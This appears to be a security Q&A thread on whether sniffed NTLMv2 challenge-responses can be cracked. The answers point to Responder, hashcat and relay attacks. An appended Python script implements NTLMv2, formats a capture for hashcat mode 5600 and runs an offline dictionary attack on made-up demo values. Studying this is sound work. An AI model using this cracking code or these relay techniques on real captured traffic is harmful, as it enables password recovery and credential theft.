
According to the Wikipedia article on NTLM here: https://en.wikipedia.org/wiki/NT_LAN_Manager

..under the NTLMv2 description it mentions that

NTLMv2 sends two responses to an 8-byte server challenge

So basically according to the article the NTLMv2 response becomes this:

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*

I am trying to understand the security challenges of NTLMv2 and how challenging it would be for an attacker who captures the above NTLMv2 response by sniffing the network to brute-force it to get to the password.

Since the hash includes the random server challenge (SC), it already makes it difficult. But let's suppose, the attacker has been sniffing and had already captured the SC when the server sent it to the client.

Attacker should also be able to see the client challenge (CC & CC*) from response as

response = LMv2 | CC | NTv2 | CC*

right? So does this mean the attacker can have a fair go at brute-forcing the NTv2 or LMv2 hashes included in the response, given that the following information is with them now:

  • SC (Server Challenge)
  • CC & CC*
  • response
  • user name, domain name (easily acquired by an attacker already in the network)

Is this the correct way to understand it?

Many thanks

Vicer

2 Answers


It's not really about brute-forcing, dictionarying (is that a word?), or rainbow-tabling the NET-NTLMv2 creds, but more so about comparing them to stored LM/NTLM hashes pulled from the flat-file SAM database or the in-memory LSASS process (which can usually be reversed to cleartext, but in this case you actually want the hash for comparative purposes).

Worse (*), NET-NTLMv2 can be used for NTLM Relay attacks. One of the best ways to expedite use of NTLM Relay is with -- https://bluescreenofjeff.com/2016-02-19-smb-relay-with-snarfjs-making-the-most-of-your-mitm/

For combining methods of LM/NTLM credential conversion (along with, say, your NET-NTLMv2 captures) to their current-valid, cleartext equivalents, check out the work from Praetorian (Gladius) and root9b (ntlmv2_capture_hashcheck.rb).

If you are trying to crack NET-NTLMv2 from just pcap files or similar (i.e., you're not on the network right now or don't have SAM/LSASS LM/NTLM material to compare it to using the Praetorian or root9b techniques), then you want to check out this blog post -- http://www.exploresecurity.com/from-csv-to-cmd-to-qwerty/ -- as the author explains which parts of the NET-NTLMv2 request and response need to be adjusted in order to fit cleanly into John the Ripper (or Hashcat) for cracking purposes.

(*) It actually gets much, much worse because NTLM Relay is only scratching the surface when you consider SMB Relay, Pass-the-Hash, JASBUG, Potato, Tater, SmashedPotato (if you can capture any network traffic), QuickCreds and PoisonTap (if you have the ability to get a USB device plugged into a local-station USB port), as well as crEAP and EAPeak (if you have access to WiFi).

atdre

Yes, it is quite feasible to do a dictionary attack on an NTLMv2 challenge response. However, with only the response, it's not possible. The attacker needs both the challenge and the response. In fact, it's actually quite fast to crack.

In fact, hackers often use a tool like Responder.py to capture NTLMv2 hashes and then use something like Hashcat to crack (or relay) the challenge response hashes.

Daniel Grover
  • Thanks. Yes you are right that's the key. Both the challenge and the response need to be captured because together they contain the sufficient information to bruteforce/rainbow attack the NTLMv2 blob. – Vicer Sep 21 '17 at 05:36
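The formula quoted in the question, and the challenge-plus-response dictionary attack the answers and the comment above describe, worked through as an added example. This is not code from the original post, from Responder, hashcat or any other tool named on this page. It implements NTLMv2 as MS-NLMP specifies it (NT hash = MD4 of the UTF-16LE password; the v2 hash keys HMAC-MD5 over the upper-cased user name and the domain; the client blob CC* is the 0x01 0x01 header, reserved bytes, FILETIME timestamp, 8-byte client challenge, the server's AV pairs and four trailing zero bytes), and prints the capture in the `user::domain:SC:NTProofStr:blob` layout that John the Ripper and hashcat (-m 5600) expect. The user, domain, password, challenges, timestamp and wordlist are constructed for the demonstration, not a real capture. The MD4 is implemented inline because `hashlib.new('md4')` is frequently unavailable on OpenSSL 3 builds.

```python
import hmac
import hashlib
import struct
from datetime import datetime, timezone

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for f, order, shifts, k in rounds:
            for i in range(16):
                j = (-i) % 4  # registers are updated in the order a, d, c, b
                r[j] = _rotl((r[j] + f(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4])
                              + x[order[i]] + k) & MASK32, shifts[i % 4])
        state = [(s + v) & MASK32 for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(nt: bytes, user: str, domain: str) -> bytes:
    # v2-Hash = HMAC-MD5(NT-Hash, user name, domain name); MS-NLMP upper-cases
    # the user name and keeps the domain exactly as sent.
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def filetime(dt: datetime) -> int:
    # Windows FILETIME: 100 ns ticks since 1601-01-01 UTC
    return int((dt - datetime(1601, 1, 1, tzinfo=timezone.utc)).total_seconds()) * 10_000_000


def av_pairs(domain: str, server: str) -> bytes:
    # TargetInfo the server sends in its CHALLENGE message:
    # MsvAvNbDomainName (2), MsvAvNbComputerName (1), MsvAvEOL (0)
    out = b""
    for av_id, value in ((2, domain), (1, server)):
        v = value.encode("utf-16-le")
        out += struct.pack("<HH", av_id, len(v)) + v
    return out + struct.pack("<HH", 0, 0)


def client_blob(ts: int, cc: bytes, target_info: bytes) -> bytes:
    # CC* from the question: RespType/HiRespType 0x01 0x01, 6 reserved bytes,
    # timestamp, 8-byte client challenge, 4 reserved bytes, AV pairs, 4 zero bytes
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ts) + cc
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(v2_hash: bytes, sc: bytes, cc: bytes, blob: bytes):
    """Return (LMv2, NTv2) laid out exactly as in the question."""
    lmv2 = hmac.new(v2_hash, sc + cc, hashlib.md5).digest() + cc      # LMv2 | CC
    ntv2 = hmac.new(v2_hash, sc + blob, hashlib.md5).digest() + blob  # NTv2 | CC*
    return lmv2, ntv2


def hashcat_5600_line(user: str, domain: str, sc: bytes, ntv2: bytes) -> str:
    # NetNTLMv2 as John/hashcat (-m 5600) take it: user::domain:SC:NTProofStr:blob
    return f"{user}::{domain}:{sc.hex()}:{ntv2[:16].hex()}:{ntv2[16:].hex()}"


def dictionary_attack(user: str, domain: str, sc: bytes, ntv2: bytes, wordlist):
    """Offline guess using only the sniffed material the question lists:
    server challenge, user name, domain, and the NTv2 response (proof + blob)."""
    proof, blob = ntv2[:16], ntv2[16:]
    for cand in wordlist:
        guess = hmac.new(ntlmv2_hash(nt_hash(cand), user, domain), sc + blob, hashlib.md5).digest()
        if hmac.compare_digest(guess, proof):
            return cand
    return None


# --- constructed demo values, not a real capture ---
USER, DOMAIN, SERVER = "vicer", "CORP", "DC01"
PASSWORD = "Winter2017!"
SC = bytes.fromhex("0123456789abcdef")  # server challenge from the CHALLENGE message
CC = bytes.fromhex("aaaaaaaaaaaaaaaa")  # client challenge
TS = filetime(datetime(2017, 9, 21, 5, 36, tzinfo=timezone.utc))
BLOB = client_blob(TS, CC, av_pairs(DOMAIN, SERVER))
LMV2, NTV2 = ntlmv2_response(ntlmv2_hash(nt_hash(PASSWORD), USER, DOMAIN), SC, CC, BLOB)
WORDLIST = ["password", "Summer2017!", "Winter2017!", "letmein"]

if __name__ == "__main__":
    print(hashcat_5600_line(USER, DOMAIN, SC, NTV2))
    print("recovered:", dictionary_attack(USER, DOMAIN, SC, NTV2, WORDLIST))
    # Without the server challenge the captured response alone gets the attacker nowhere:
    print("wrong SC :", dictionary_attack(USER, DOMAIN, bytes(8), NTV2, WORDLIST))
```

The second `dictionary_attack` call is the point made in the accepted comment above: the same response checked against the wrong server challenge matches nothing, so a sniffer has to record the CHALLENGE message as well as the AUTHENTICATE message. Note also that the per-guess cost is one MD4 plus two HMAC-MD5s, which is why hashcat mode 5600 runs at a rate where a weak password falls quickly once both halves are captured.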